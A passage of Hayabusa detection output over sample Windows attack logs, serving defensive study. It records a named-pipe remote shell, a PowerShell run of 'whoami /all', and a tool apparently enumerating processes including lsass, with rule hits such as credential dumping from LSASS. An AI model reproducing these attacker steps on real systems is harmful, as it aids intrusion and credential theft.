%SourceUser% | Tgt User: %TargetUser% | Access: 0x800 | Src PID: 860 | Src PGUID: 365ABB72-D3C2-5CC5-0000-0010D9790500 | Tgt PID: 748 | Tgt PGUID: 365ABB72-D3E8-5CC5-0000-0010E7D30500,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/process_suspend_sysmon_10_ga_800.evtx +2019-04-29 20:59:14.447 +00:00,IEWIN7,18,info,,Pipe Connected,\46a676ab7f179e511e30dd2dc41bd388 | Process: System | PID: 4 | PGUID: 
365ABB72-D9C4-5CC7-0000-0010EA030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-29 20:59:14.447 +00:00,IEWIN7,18,critical,Evas | PrivEsc,Malicious Named Pipe,,rules/sigma/pipe_created/pipe_created_mal_namedpipes.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-29 20:59:15.575 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:445 (IEWIN7) | Dst: 10.0.2.17:63025 (NLLT106876) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-D9C4-5CC7-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-29 20:59:21.539 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x10896 | PID: 3376 | PGUID: 365ABB72-65A9-5CC7-0000-00104E5C2400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-29 20:59:21.539 +00:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3940 | Src PGUID: 365ABB72-6231-5CC7-0000-00104CF71800 | Tgt PID: 3376 | Tgt PGUID: 365ABB72-65A9-5CC7-0000-00104E5C2400,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-29 20:59:21.539 +00:00,IEWIN7,1,low,Exec,Non Interactive 
PowerShell,,rules/sigma/process_creation_sysmon/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-29 20:59:21.539 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-29 20:59:22.144 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\whoami.exe"" /all | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile | LID: 0x10896 | PID: 2116 | PGUID: 365ABB72-65AA-5CC7-0000-00104D882400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-29 20:59:22.144 +00:00,IEWIN7,10,low,,Process Access,Src Process: io\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\whoami.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3376 | Src PGUID: 365ABB72-65A9-5CC7-0000-00104E5C2400 | Tgt PID: 2116 | Tgt PGUID: 365ABB72-65AA-5CC7-0000-00104D882400,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-29 20:59:22.144 +00:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_sysmon/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-29 20:59:22.144 +00:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-29 20:59:22.144 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-29 20:59:55.472 +00:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x10896 | PID: 2244 | PGUID: 365ABB72-65CB-5CC7-0000-001002202600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 07:22:56.571 +00:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Local\Programs\Opera\launcher.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Temp\opera autoupdate\installer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3712 | Src PGUID: 365ABB72-F7D0-5CC7-0000-0010D0220E00 | Tgt PID: 2784 | Tgt PGUID: 365ABB72-F7D0-5CC7-0000-0010CB280E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:22:56.930 +00:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Local\Programs\Opera\launcher.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Programs\Opera\60.0.3255.70\opera_autoupdate.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3712 | Src PGUID: 365ABB72-F7D0-5CC7-0000-0010D0220E00 | Tgt PID: 3624 | Tgt PGUID: 365ABB72-F7D0-5CC7-0000-0010DF2F0E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:22:57.149 
+00:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Local\Programs\Opera\60.0.3255.70\opera_autoupdate.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Programs\Opera\60.0.3255.70\opera_autoupdate.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3624 | Src PGUID: 365ABB72-F7D0-5CC7-0000-0010DF2F0E00 | Tgt PID: 3504 | Tgt PGUID: 365ABB72-F7D1-5CC7-0000-0010AF380E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.883 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\smss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 264 | Tgt PGUID: 365ABB72-F69F-5CC7-0000-0010132B0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.883 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\csrss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 336 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-001033480000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\wininit.exe | Src 
User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 384 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-0010A74B0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\csrss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 392 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-00103F4C0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\winlogon.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 440 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-001043520000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\services.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 468 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-001004550000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt 
User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 492 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-001072590000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\lsm.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 500 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-0010A3590000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 616 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-0010BB700000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\VBoxService.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 676 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-0010E7AC0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | 
Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 740 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-00101AB00000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 804 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-00105FB40000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 872 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-001015C00000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 908 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-0010A7C40000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,medium,CredAccess,Rare GrantedAccess Flags on LSASS 
Access,,rules/sigma/process_access/proc_access_win_rare_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/proc_access_win_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,low,PrivEsc | 
Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.899 
+00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 956 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-001014C90000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1016 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-001012CF0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1148 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-0010F9D80000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\spoolsv.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 
365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1288 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-00100EED0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1328 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-0010B8F20000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1476 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-0010D30E0100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\taskhost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1504 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-001062120100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\taskeng.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 
365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1572 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-0010051A0100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Program Files\OpenSSH\bin\cygrunsrv.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1732 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-0010443A0100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\conhost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1904 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-0010F7500100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Program Files\OpenSSH\usr\sbin\sshd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1952 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-00108A560100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\wlms\wlms.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 
365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1996 | Tgt PGUID: 365ABB72-F6A4-5CC7-0000-0010C65F0100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\wbem\unsecapp.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1000 | Tgt PGUID: 365ABB72-F6A4-5CC7-0000-001098750100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 